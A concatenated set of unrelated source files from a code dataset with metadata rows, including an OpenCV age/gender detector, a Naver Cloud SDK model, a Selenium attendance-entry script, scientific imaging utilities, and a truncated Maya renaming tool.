genderNet = cv2.dnn.readNet(genderModel, genderProto)
video = cv2.VideoCapture(args.image if args.image else 0)
padding = 20
while cv2.waitKey(1) < 0:
hasFrame, frame = video.read()
if not hasFrame:
cv2.waitKey()
break
resultImg, faceBoxes = highlightFace(faceNet, frame)
if not faceBoxes:
print("No face detected")
for faceBox in faceBoxes:
        face = frame[max(0, faceBox[1] - padding):min(faceBox[3] + padding, frame.shape[0] - 1),
                     max(0, faceBox[0] - padding):min(faceBox[2] + padding, frame.shape[1] - 1)]
blob = cv2.dnn.blobFromImage(face, 1.0, (227, 227), MODEL_MEAN_VALUES, swapRB=False)
genderNet.setInput(blob)
genderPreds = genderNet.forward()
gender = genderList[genderPreds[0].argmax()]
print(f'Gender: {gender}')
ageNet.setInput(blob)
agePreds = ageNet.forward()
age = ageList[agePreds[0].argmax()]
print(f'Age: {age[1:-1]} years')
cv2.putText(resultImg, f'{gender}, {age}', (faceBox[0], faceBox[1] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.8,
(0, 255, 255), 2, cv2.LINE_AA)
cv2.imshow("Detecting age and gender", resultImg)
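# Typical invocation (a sketch): ``python detect.py --image photo.jpg`` to run on a
# single image, or ``python detect.py`` with no argument to read frames from the
# default webcam (device 0). The .pb/.prototxt/.caffemodel files referenced above
# are expected in the working directory.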
| 37.701299
| 116
| 0.604203
|
cf9dc4030afccc4c3f9fa6f49d330a8d8d781fe5
| 9,036
|
py
|
Python
|
lib/services/vserver/ncloud_vserver/model/get_access_control_group_list_request.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 12
|
2018-11-20T04:30:49.000Z
|
2021-11-09T12:34:26.000Z
|
lib/services/vserver/ncloud_vserver/model/get_access_control_group_list_request.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 1
|
2019-01-24T15:56:15.000Z
|
2019-05-31T07:56:55.000Z
|
lib/services/vserver/ncloud_vserver/model/get_access_control_group_list_request.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 6
|
2018-06-29T03:45:50.000Z
|
2022-03-18T01:51:45.000Z
|
# coding: utf-8
"""
vserver
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetAccessControlGroupListRequest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'region_code': 'str',
'access_control_group_no_list': 'list[str]',
'access_control_group_name': 'str',
'access_control_group_status_code': 'str',
'page_no': 'int',
'page_size': 'int',
'vpc_no': 'str'
}
attribute_map = {
'region_code': 'regionCode',
'access_control_group_no_list': 'accessControlGroupNoList',
'access_control_group_name': 'accessControlGroupName',
'access_control_group_status_code': 'accessControlGroupStatusCode',
'page_no': 'pageNo',
'page_size': 'pageSize',
'vpc_no': 'vpcNo'
}
def __init__(self, region_code=None, access_control_group_no_list=None, access_control_group_name=None, access_control_group_status_code=None, page_no=None, page_size=None, vpc_no=None): # noqa: E501
"""GetAccessControlGroupListRequest - a model defined in Swagger""" # noqa: E501
self._region_code = None
self._access_control_group_no_list = None
self._access_control_group_name = None
self._access_control_group_status_code = None
self._page_no = None
self._page_size = None
self._vpc_no = None
self.discriminator = None
if region_code is not None:
self.region_code = region_code
if access_control_group_no_list is not None:
self.access_control_group_no_list = access_control_group_no_list
if access_control_group_name is not None:
self.access_control_group_name = access_control_group_name
if access_control_group_status_code is not None:
self.access_control_group_status_code = access_control_group_status_code
if page_no is not None:
self.page_no = page_no
if page_size is not None:
self.page_size = page_size
if vpc_no is not None:
self.vpc_no = vpc_no
@property
def region_code(self):
"""Gets the region_code of this GetAccessControlGroupListRequest. # noqa: E501
        REGION code  # noqa: E501
:return: The region_code of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._region_code
@region_code.setter
def region_code(self, region_code):
"""Sets the region_code of this GetAccessControlGroupListRequest.
        REGION code  # noqa: E501
:param region_code: The region_code of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._region_code = region_code
@property
def access_control_group_no_list(self):
"""Gets the access_control_group_no_list of this GetAccessControlGroupListRequest. # noqa: E501
        ACG number list  # noqa: E501
:return: The access_control_group_no_list of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: list[str]
"""
return self._access_control_group_no_list
@access_control_group_no_list.setter
def access_control_group_no_list(self, access_control_group_no_list):
"""Sets the access_control_group_no_list of this GetAccessControlGroupListRequest.
        ACG number list  # noqa: E501
:param access_control_group_no_list: The access_control_group_no_list of this GetAccessControlGroupListRequest. # noqa: E501
:type: list[str]
"""
self._access_control_group_no_list = access_control_group_no_list
@property
def access_control_group_name(self):
"""Gets the access_control_group_name of this GetAccessControlGroupListRequest. # noqa: E501
        ACG name  # noqa: E501
:return: The access_control_group_name of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._access_control_group_name
@access_control_group_name.setter
def access_control_group_name(self, access_control_group_name):
"""Sets the access_control_group_name of this GetAccessControlGroupListRequest.
        ACG name  # noqa: E501
:param access_control_group_name: The access_control_group_name of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._access_control_group_name = access_control_group_name
@property
def access_control_group_status_code(self):
"""Gets the access_control_group_status_code of this GetAccessControlGroupListRequest. # noqa: E501
        ACG status code  # noqa: E501
:return: The access_control_group_status_code of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._access_control_group_status_code
@access_control_group_status_code.setter
def access_control_group_status_code(self, access_control_group_status_code):
"""Sets the access_control_group_status_code of this GetAccessControlGroupListRequest.
        ACG status code  # noqa: E501
:param access_control_group_status_code: The access_control_group_status_code of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._access_control_group_status_code = access_control_group_status_code
@property
def page_no(self):
"""Gets the page_no of this GetAccessControlGroupListRequest. # noqa: E501
        Page number  # noqa: E501
:return: The page_no of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: int
"""
return self._page_no
@page_no.setter
def page_no(self, page_no):
"""Sets the page_no of this GetAccessControlGroupListRequest.
        Page number  # noqa: E501
:param page_no: The page_no of this GetAccessControlGroupListRequest. # noqa: E501
:type: int
"""
self._page_no = page_no
@property
def page_size(self):
"""Gets the page_size of this GetAccessControlGroupListRequest. # noqa: E501
        Page size  # noqa: E501
:return: The page_size of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: int
"""
return self._page_size
@page_size.setter
def page_size(self, page_size):
"""Sets the page_size of this GetAccessControlGroupListRequest.
        Page size  # noqa: E501
:param page_size: The page_size of this GetAccessControlGroupListRequest. # noqa: E501
:type: int
"""
self._page_size = page_size
@property
def vpc_no(self):
"""Gets the vpc_no of this GetAccessControlGroupListRequest. # noqa: E501
        VPC number  # noqa: E501
:return: The vpc_no of this GetAccessControlGroupListRequest. # noqa: E501
:rtype: str
"""
return self._vpc_no
@vpc_no.setter
def vpc_no(self, vpc_no):
"""Sets the vpc_no of this GetAccessControlGroupListRequest.
        VPC number  # noqa: E501
:param vpc_no: The vpc_no of this GetAccessControlGroupListRequest. # noqa: E501
:type: str
"""
self._vpc_no = vpc_no
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetAccessControlGroupListRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
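# A usage sketch (field values are illustrative only):
#
#     req = GetAccessControlGroupListRequest(region_code='KR', page_no=1, page_size=20)
#     payload = req.to_dict()
#     # -> {'region_code': 'KR', 'page_no': 1, 'page_size': 20, ...} with unset fields as None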
| 32.271429
| 204
| 0.64907
|
6e6062bfb8d0710c5152d45b7b793375fbde4f05
| 291
|
py
|
Python
|
molssi_math/string_util.py
|
arefnel/sermacs-workshop
|
f53ced2796d450c58f4fbb545259cd3e8552244e
|
[
"BSD-3-Clause"
] | null | null | null |
molssi_math/string_util.py
|
arefnel/sermacs-workshop
|
f53ced2796d450c58f4fbb545259cd3e8552244e
|
[
"BSD-3-Clause"
] | null | null | null |
molssi_math/string_util.py
|
arefnel/sermacs-workshop
|
f53ced2796d450c58f4fbb545259cd3e8552244e
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Misc. string processing functions
"""
def title_case(sentence):
"""
:param sentence:
        sentence to be converted
    :return: string with each word capitalized
    :example: >>> title_case("This iS tHe")
This Is The
"""
return ' '.join([i.capitalize() for i in sentence.split()])
| 20.785714
| 63
| 0.594502
|
83da56c44018c7e5882deae9eb874f2a960b23b7
| 1,177
|
py
|
Python
|
sdk/python/pulumi_aws_native/ivs/_enums.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/ivs/_enums.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/ivs/_enums.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'ChannelLatencyMode',
'ChannelType',
'RecordingConfigurationState',
'RecordingConfigurationThumbnailConfigurationRecordingMode',
]
class ChannelLatencyMode(str, Enum):
"""
Channel latency mode.
"""
NORMAL = "NORMAL"
LOW = "LOW"
class ChannelType(str, Enum):
"""
Channel type, which determines the allowable resolution and bitrate. If you exceed the allowable resolution or bitrate, the stream probably will disconnect immediately.
"""
STANDARD = "STANDARD"
BASIC = "BASIC"
class RecordingConfigurationState(str, Enum):
"""
Recording Configuration State.
"""
CREATING = "CREATING"
CREATE_FAILED = "CREATE_FAILED"
ACTIVE = "ACTIVE"
class RecordingConfigurationThumbnailConfigurationRecordingMode(str, Enum):
"""
Thumbnail Recording Mode, which determines whether thumbnails are recorded at an interval or are disabled.
"""
INTERVAL = "INTERVAL"
DISABLED = "DISABLED"
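# Because these enums subclass ``str``, members compare equal to their plain string
# values, e.g. (a sketch):
#
#     assert ChannelType.STANDARD == "STANDARD"
#     assert ChannelLatencyMode.LOW.value == "LOW"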
| 25.586957
| 172
| 0.697536
|
7022b3dae4ba45d026c89e12469b39297be93341
| 7,920
|
py
|
Python
|
kincone/kincone.py
|
rozeroze/kincone-send-attendance
|
be7d3305722d98d5769e7e281308ce81ac7566d6
|
[
"MIT"
] | null | null | null |
kincone/kincone.py
|
rozeroze/kincone-send-attendance
|
be7d3305722d98d5769e7e281308ce81ac7566d6
|
[
"MIT"
] | null | null | null |
kincone/kincone.py
|
rozeroze/kincone-send-attendance
|
be7d3305722d98d5769e7e281308ce81ac7566d6
|
[
"MIT"
] | null | null | null |
import sys
import csv
import time
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
LOGIN_URL = "https://kincone.com/auth/login"
LOGOUT_URL = "https://kincone.com/auth/logout"
CONFIGFILE = "/kincone/.kincone.user"
ATTENDANCEFILE = "/kincone/attendance.csv"
SCREENSHOT = "/kincone/snap/"
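# Row title kincone shows for entries that were already edited ("編集済みです" ≈ "already edited").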
TITLES = ["編集済みです"]
email = None
password = None
attendances = []
class Browser:
driver = None
def __init__(self):
pass
    def open(self):
pass
class Attendance:
def data_load(self, data):
self.overwrite = data[0]
self.date = data[1]
self.start_hours = data[2]
self.end_hours = data[3]
self.outing_out_hours = data[4]
self.outing_in_hours = data[5]
self.note = data[6]
def set_id(self, data_id):
self.id = data_id
OPT = Options()
OPT.add_argument('-headless')
def load_userconf():
global email
global password
with open(CONFIGFILE, mode = "r") as f:
lines = f.read().splitlines()
for line in lines:
[lhs, rhs] = line.split("=")
if lhs == "email":
email = rhs
elif lhs == "password":
password = rhs
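# .kincone.user is expected to contain one "key=value" pair per line, e.g.
# (values below are placeholders):
#   email=user@example.com
#   password=secret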
def load_attendances():
global attendances
with open(ATTENDANCEFILE, mode = "r") as f:
reader = csv.reader(f)
lines = [row for row in reader]
attendances = lines[1:] # no-header
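# attendance.csv is expected to have a header row followed by one record per day,
# with the columns consumed by Attendance.data_load():
#   overwrite,date,start_hours,end_hours,outing_out_hours,outing_in_hours,note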
def get_current_window_size(driver):
print("log: call get_current_window_size(driver)")
w = driver.execute_script('return document.body.scrollWidth')
h = driver.execute_script('return document.body.scrollHeight')
driver.set_window_size(w, h)
def make_snap(driver, name):
print("log: call make_snap(driver, name)")
driver.save_screenshot(SCREENSHOT + name)
print("log: -> " + SCREENSHOT + name)
def kincone_open(driver):
print("log: call kicone_open(driver)")
driver.get(LOGIN_URL)
def kincone_login(driver):
print("log: call kincone_login(driver)")
form = driver.find_element_by_css_selector("#content > div.container > div > div > div.col-sm-4.col-sm-offset-4 > div > form")
form.find_element_by_id("email").send_keys(email)
form.find_element_by_id("password").send_keys(password)
form.find_element_by_css_selector("div.clearfix.form-group > div.pull-right > input").click()
def kincone_logout(driver):
print("log: call kincone_logout(driver)")
driver.get(LOGOUT_URL)
def kincone_get_data_id(driver, attendance):
print("log: call kincone_get_data_id(driver, attendance)")
row_id = "attendance-row-{0}".format(attendance.date)
data_id = driver.find_element_by_css_selector("#{0} .delete-button".format(row_id)).get_attribute("data-id")
return data_id
def kincone_is_data_exists(driver, attendance):
print("log: call kincone_is_data_exists(driver, attendance)")
row_id = "attendance-row-{0}".format(attendance.date)
title = driver.find_element_by_id(row_id).get_attribute("title")
for t in TITLES:
if t == title:
return True
return False
def kincone_remove_attendance(driver, attendance):
print("log: call kincone_remove_attendance(driver, attendance)")
# display remove-dialog
row_id = "attendance-row-{0}".format(attendance.date)
#driver.execute_script("document.querySelector('#{0}').scrollIntoView()".format(row_id))
#driver.find_element_by_css_selector("#{0} .delete-button".format(row_id)).click()
driver.execute_script("document.querySelector('#{0} .delete-button').click()".format(row_id))
time.sleep(5)
make_snap(driver, "open-remove-dialog.png")
# send delete
form = driver.find_element_by_css_selector("#content > div.container > div > div.modal.fade.bs-delete-modal-sm > div > div > div.modal-footer > form")
#form.find_element_by_id("id").send_keys(attendance.id)
form.submit()
time.sleep(5)
def kincone_open_attendance(driver, attendance):
print("log: call kincone_open_attendance(driver, attendance)")
url = "https://kincone.com/attendance/edit/{0}".format(attendance.id)
print("log: in-edit: open url -> {0}".format(url))
driver.get(url)
# hour
def kincone_edit_attendance_hour(driver, attendance):
print("log: call kincone_edit_attendance_hour(driver, attendance)")
driver.find_element_by_id("start_hours").send_keys(attendance.start_hours)
driver.find_element_by_css_selector("#outings > button").click()
driver.find_element_by_id("out_hours_0").send_keys(attendance.outing_out_hours)
driver.find_element_by_id("in_hours_0").send_keys(attendance.outing_in_hours)
driver.find_element_by_id("end_hours").send_keys(attendance.end_hours)
# flag
def kincone_edit_attendance_flags(driver, attendance):
print("log: call kincone_edit_attendance_flags(driver, attendance)")
# note: be all checkboxes out
section = driver.find_element_by_css_selector("#form-attendance-edit > div:nth-child(7)")
checkboxes = section.find_elements_by_css_selector("input[type=checkbox]:checked")
for checkbox in checkboxes:
checkbox.click()
# note
def kincone_edit_attendance_note(driver, attendance):
print("log: call kincone_edit_attendance_note(driver, attendance)")
driver.find_element_by_id("note").send_keys(attendance.note)
# submit
def kincone_submit_attendance(driver, attendance):
print("log: call kincone_submit_attendance(driver, attendance)")
# edit-page submit ( to confirm-page )
driver.find_element_by_css_selector("#form-attendance-edit > div:nth-child(11) > div:nth-child(2) > button").click()
# confirm-page submit
driver.find_element_by_css_selector("#form-attendance-confirm > div:nth-child(13) > div:nth-child(2) > button").click()
def kincone_edit_attendance(driver, attendance):
print("log: call kincone_edit_attendance(driver, attendance)")
try:
#driver = webdriver.Firefox(options=OPT)
atndriver = driver
print("log: in-edit: webdriver start")
kincone_open_attendance(atndriver, attendance)
make_snap(atndriver, "attendance-{0}-opened.png".format(attendance.date))
kincone_edit_attendance_hour(atndriver, attendance)
kincone_edit_attendance_flags(atndriver, attendance)
kincone_edit_attendance_note(atndriver, attendance)
make_snap(atndriver, "attendance-{0}-pre-submit.png".format(attendance.date))
kincone_submit_attendance(atndriver, attendance)
make_snap(atndriver, "attendance-{0}-post-submit.png".format(attendance.date))
except Exception as e:
print(e)
finally:
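        # Note: atndriver is the same driver instance that main() passed in (the
        # local re-creation above is commented out), so quitting it here also ends
        # the session used by the caller.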
atndriver.quit()
print("log: in-edit: webdriver quit")
def main():
print("log: call main()")
try:
driver = webdriver.Firefox(options=OPT)
print("log: webdriver start")
driver.implicitly_wait(10)
print("log: webdriver set implicitly_wait -> 10")
kincone_open(driver)
get_current_window_size(driver)
kincone_login(driver)
make_snap(driver, "login.png")
load_attendances()
print("log: load attendance file")
for attendance in attendances:
print("log: data ->", attendance)
atn = Attendance()
atn.data_load(attendance)
data_id = kincone_get_data_id(driver, atn)
atn.set_id(data_id)
print("log: id ->", atn.id)
if (atn.overwrite == "1" and kincone_is_data_exists(driver, atn)):
print("log: overwrite is true and data exists, try remove")
kincone_remove_attendance(driver, atn)
kincone_edit_attendance(driver, atn)
break # test: one pattern
kincone_logout(driver)
make_snap(driver, "logout.png")
except Exception as e:
print(e)
finally:
driver.quit()
print("log: webdriver quit")
if __name__ == '__main__':
main()
| 38.076923
| 154
| 0.687247
|
734510a5332c945e529a61282c8a272e26d20db1
| 3,747
|
py
|
Python
|
visualize.py
|
leilimaster/DmifNet
|
cad50bb7a3762745f72b2498c2eef5ad5b21e4c6
|
[
"MIT"
] | 25
|
2020-07-24T08:24:09.000Z
|
2022-02-22T07:08:54.000Z
|
dmifnet/utils/visualize.py
|
leilimaster/DmifNet
|
cad50bb7a3762745f72b2498c2eef5ad5b21e4c6
|
[
"MIT"
] | 2
|
2021-01-28T09:54:02.000Z
|
2021-02-02T09:08:11.000Z
|
dmifnet/visualize.py
|
leilimaster/DmifNet
|
cad50bb7a3762745f72b2498c2eef5ad5b21e4c6
|
[
"MIT"
] | 1
|
2021-06-19T08:47:48.000Z
|
2021-06-19T08:47:48.000Z
|
import numpy as np
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from torchvision.utils import save_image
import dmifnet.common as common
def visualize_data(data, data_type, out_file):
r''' Visualizes the data with regard to its type.
Args:
data (tensor): batch of data
data_type (string): data type (img, voxels or pointcloud)
out_file (string): output file
'''
if data_type == 'img':
if data.dim() == 3:
data = data.unsqueeze(0)
save_image(data, out_file, nrow=4)
elif data_type == 'voxels':
visualize_voxels(data, out_file=out_file)
elif data_type == 'pointcloud':
visualize_pointcloud(data, out_file=out_file)
elif data_type is None or data_type == 'idx':
pass
else:
raise ValueError('Invalid data_type "%s"' % data_type)
def visualize_voxels(voxels, out_file=None, show=False):
r''' Visualizes voxel data.
Args:
voxels (tensor): voxel data
out_file (string): output file
show (bool): whether the plot should be shown
'''
# Use numpy
voxels = np.asarray(voxels)
# Create plot
fig = plt.figure()
ax = fig.gca(projection=Axes3D.name)
voxels = voxels.transpose(2, 0, 1)
ax.voxels(voxels, edgecolor='k')
ax.set_xlabel('Z')
ax.set_ylabel('X')
ax.set_zlabel('Y')
ax.view_init(elev=30, azim=45)
if out_file is not None:
plt.savefig(out_file)
if show:
plt.show()
plt.close(fig)
def visualize_pointcloud(points, normals=None,
out_file=None, show=False):
r''' Visualizes point cloud data.
Args:
points (tensor): point data
normals (tensor): normal data (if existing)
out_file (string): output file
show (bool): whether the plot should be shown
'''
# Use numpy
points = np.asarray(points)
# Create plot
fig = plt.figure()
ax = fig.gca(projection=Axes3D.name)
ax.scatter(points[:, 2], points[:, 0], points[:, 1])
if normals is not None:
ax.quiver(
points[:, 2], points[:, 0], points[:, 1],
normals[:, 2], normals[:, 0], normals[:, 1],
length=0.1, color='k'
)
ax.set_xlabel('Z')
ax.set_ylabel('X')
ax.set_zlabel('Y')
ax.set_xlim(-0.5, 0.5)
ax.set_ylim(-0.5, 0.5)
ax.set_zlim(-0.5, 0.5)
ax.view_init(elev=30, azim=45)
if out_file is not None:
plt.savefig(out_file)
if show:
plt.show()
plt.close(fig)
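# A quick sketch of how the helpers above can be called (random data, for illustration):
#
#     import numpy as np
#     pts = np.random.rand(1024, 3) - 0.5
#     visualize_pointcloud(pts, out_file='pc.png')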
def visualise_projection(
self, points, world_mat, camera_mat, img, output_file='out.png'):
r''' Visualizes the transformation and projection to image plane.
The first points of the batch are transformed and projected to the
respective image. After performing the relevant transformations, the
visualization is saved in the provided output_file path.
Arguments:
points (tensor): batch of point cloud points
world_mat (tensor): batch of matrices to rotate pc to camera-based
coordinates
camera_mat (tensor): batch of camera matrices to project to 2D image
plane
img (tensor): tensor of batch GT image files
output_file (string): where the output should be saved
'''
points_transformed = common.transform_points(points, world_mat)
points_img = common.project_to_camera(points_transformed, camera_mat)
pimg2 = points_img[0].detach().cpu().numpy()
image = img[0].cpu().numpy()
plt.imshow(image.transpose(1, 2, 0))
plt.plot(
(pimg2[:, 0] + 1)*image.shape[1]/2,
(pimg2[:, 1] + 1) * image.shape[2]/2, 'x')
plt.savefig(output_file)
| 31.754237
| 76
| 0.622365
|
1c2e829f76a0ecd0a9354921fb8cf2b2cf7783c3
| 447
|
py
|
Python
|
tools/python/boutiques/tests/test_pprint.py
|
jerdra/boutiques
|
f6ee252fd1332ec686dc76dc12e52a0d69c685c3
|
[
"MIT"
] | null | null | null |
tools/python/boutiques/tests/test_pprint.py
|
jerdra/boutiques
|
f6ee252fd1332ec686dc76dc12e52a0d69c685c3
|
[
"MIT"
] | null | null | null |
tools/python/boutiques/tests/test_pprint.py
|
jerdra/boutiques
|
f6ee252fd1332ec686dc76dc12e52a0d69c685c3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import os.path as op
from unittest import TestCase
from boutiques import __file__ as bfile
from six import string_types
import boutiques as bosh
class TestPPrint(TestCase):
def test_doesntcrash(self):
fil = op.join(op.split(bfile)[0],
'schema/examples/test_pretty_print.json')
prettystring = bosh.prettyprint(fil)
assert(isinstance(prettystring, string_types))
| 24.833333
| 63
| 0.711409
|
e6cc5e97ef57b1d175d4270bfd16a5e8c96e6c89
| 671
|
py
|
Python
|
melange/messaging/event_message.py
|
mangeld/melange
|
1650268b312f3fea7b26afa2fc8ea4f8dd3948e3
|
[
"MIT"
] | null | null | null |
melange/messaging/event_message.py
|
mangeld/melange
|
1650268b312f3fea7b26afa2fc8ea4f8dd3948e3
|
[
"MIT"
] | null | null | null |
melange/messaging/event_message.py
|
mangeld/melange
|
1650268b312f3fea7b26afa2fc8ea4f8dd3948e3
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from marshmallow import Schema, fields
class EventSchema(Schema):
event_type_name = fields.Str()
occurred_on = fields.DateTime()
class EventMessage:
# A constant that subscriber can use in their "listens_to" events to
# tell they are interested in all the events that happen on their topic
ALL = 'ALL'
event_type_name = 'Default'
def __init__(self, occurred_on=None):
# A datetime.now() default argument is evaluated once at class-definition time,
# so resolve the timestamp at call time instead.
self.occurred_on = occurred_on if occurred_on is not None else datetime.now()
self.event_type_name = self.event_type_name
def get_occurred_on(self):
return self.occurred_on
def get_event_type_name(self):
return self.event_type_name
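# Usage sketch (the OrderPlaced name is an assumption made for illustration):
# a concrete event subclass that can be serialized through EventSchema.
class OrderPlaced(EventMessage):
    event_type_name = 'OrderPlaced'
# EventSchema().dump(OrderPlaced()) then yields the event_type_name and
# occurred_on fields in a serializable form.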
| 23.964286
| 75
| 0.716841
|
08fd49debdad2f1475799e1ba87d36097c8c2d0a
| 3,299
|
py
|
Python
|
src/dxtbx/format/FormatCBFMiniEigerDLS16MSN160.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 3
|
2019-08-16T05:46:29.000Z
|
2020-09-18T08:38:37.000Z
|
src/dxtbx/format/FormatCBFMiniEigerDLS16MSN160.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 448
|
2019-04-06T01:20:56.000Z
|
2022-03-31T15:58:48.000Z
|
src/dxtbx/format/FormatCBFMiniEigerDLS16MSN160.py
|
toastisme/dxtbx
|
fc24e215a8052e7e17be4ad4b41f9dbb474d852a
|
[
"BSD-3-Clause"
] | 10
|
2019-04-08T13:30:32.000Z
|
2021-09-30T14:48:50.000Z
|
import sys
import libtbx
from scitbx.array_family import flex
from dxtbx.format.FormatCBFMiniEiger import FormatCBFMiniEiger
from dxtbx.masking import GoniometerMaskerFactory
class FormatCBFMiniEigerDLS16MSN160(FormatCBFMiniEiger):
@staticmethod
def understand(image_file):
"""Check to see if this format class can understand the image file.
Args:
image_file (str): The file path of the image file to check.
Returns:
bool: Returns ``True`` if the image_file is understood by this format class,
else returns ``False``.
"""
# this depends on DIALS for the goniometer shadow model; if missing
# simply return False
header = FormatCBFMiniEiger.get_cbf_header(image_file)
for record in header.split("\n"):
if (
"# detector" in record.lower()
and "eiger" in record.lower()
and "S/N 160-0001" in header
):
return True
return False
@staticmethod
def has_dynamic_shadowing(**kwargs):
dynamic_shadowing = kwargs.get("dynamic_shadowing", False)
if dynamic_shadowing in (libtbx.Auto, "Auto"):
return True
return dynamic_shadowing
def __init__(self, image_file, **kwargs):
"""Initialise the image structure from the given file."""
self._dynamic_shadowing = self.has_dynamic_shadowing(**kwargs)
super().__init__(image_file, **kwargs)
def _goniometer(self):
"""Return a model for a multi-axis goniometer.
This should be checked against the image header, though for miniCBF
there are limited options for this.
Returns:
dxtbx.model.Goniometer.MultiAxisGoniometer: The goniometer model for
this detector.
"""
if "Phi" in self._cif_header_dictionary:
phi = float(self._cif_header_dictionary["Phi"].split()[0])
else:
phi = 0.0
if "Chi" in self._cif_header_dictionary:
chi = float(self._cif_header_dictionary["Chi"].split()[0])
else:
chi = 0.0
if "Omega" in self._cif_header_dictionary:
omega = float(self._cif_header_dictionary["Omega"].split()[0])
else:
omega = 0.0
phi_axis = (1, 0, 0)
chi_axis = (0, 0, -1)
omega_axis = (1, 0, 0)
axes = flex.vec3_double((phi_axis, chi_axis, omega_axis))
angles = flex.double((phi, chi, omega))
names = flex.std_string(("GON_PHI", "GON_CHI", "GON_OMEGA"))
return self._goniometer_factory.make_multi_axis_goniometer(
axes, angles, names, scan_axis=2
)
def get_goniometer_shadow_masker(self, goniometer=None):
if goniometer is None:
goniometer = self.get_goniometer()
assert goniometer is not None
if goniometer.get_names()[1] == "GON_CHI":
# SmarGon
return GoniometerMaskerFactory.smargon(goniometer)
else:
raise ValueError(
"Don't understand this goniometer: %s" % list(goniometer.get_names())
)
if __name__ == "__main__":
for arg in sys.argv[1:]:
print(FormatCBFMiniEigerDLS16MSN160.understand(arg))
| 30.546296
| 86
| 0.615035
|
6d3e1ca2142ee69c7ac166b245e16685c4a13346
| 31,069
|
py
|
Python
|
programs/maya/scripts/naming.py
|
nicklovin/pipeline
|
4d8e042783321e5b0ed7b8a713a7db4d2cef9adb
|
[
"BSD-2-Clause"
] | null | null | null |
programs/maya/scripts/naming.py
|
nicklovin/pipeline
|
4d8e042783321e5b0ed7b8a713a7db4d2cef9adb
|
[
"BSD-2-Clause"
] | null | null | null |
programs/maya/scripts/naming.py
|
nicklovin/pipeline
|
4d8e042783321e5b0ed7b8a713a7db4d2cef9adb
|
[
"BSD-2-Clause"
] | null | null | null |
import maya.cmds as cmds
import pymel.core as pm
from string import ascii_uppercase
from functools import partial
from PySide2 import QtWidgets, QtCore, QtGui
import Splitter
from maya_tools.contexts.undoContext import UndoContext
LETTERS_INDEX = {index: letter for index, letter in
enumerate(ascii_uppercase, start=1)}
def get_short_name(longname):
"""
Returns the shortname of an input object.
"""
return longname.rsplit('|', 1)[-1]
def get_long_name(name):
"""
Returns the longname of an object.
"""
return cmds.ls(name, long=True)[0]
# TODO: Kwargs: numeric_index, start_number?, upper_case, end_name,
# TODO: name_list should be required and renamed
def list_renamer(new_name, numeric_index=True, start_number=1,
upper_case=True, end_name=False, name_list=[]):
"""
Renamer tool for renaming lists of objects. By default it works on the
current selection, but it can take a list parameter when called from
larger tools and functions.
Args:
new_name (str): Name to assign to object list. Must include at least
one '#'.
numeric_index (bool): Assign numeric values to the padding of renamed
objects in the list. If false, uses alphanumeric.
start_number (int): Assign starting index for the numeric renaming. In
alphanumeric, it will apply to the corresponding letter position.
(ex. 2 = 'B')
upper_case (bool): Assign alphabet identifier as uppercase or lowercase.
end_name (bool): Assign if the last object in the list should have the
numeric value replaced with 'END'.
name_list (list[str]): Assign the function to perform based on a list
input not limited to selection. Only active when selection argument
is False.
Returns:
(list): List of all the newly named nodes.
"""
if name_list:
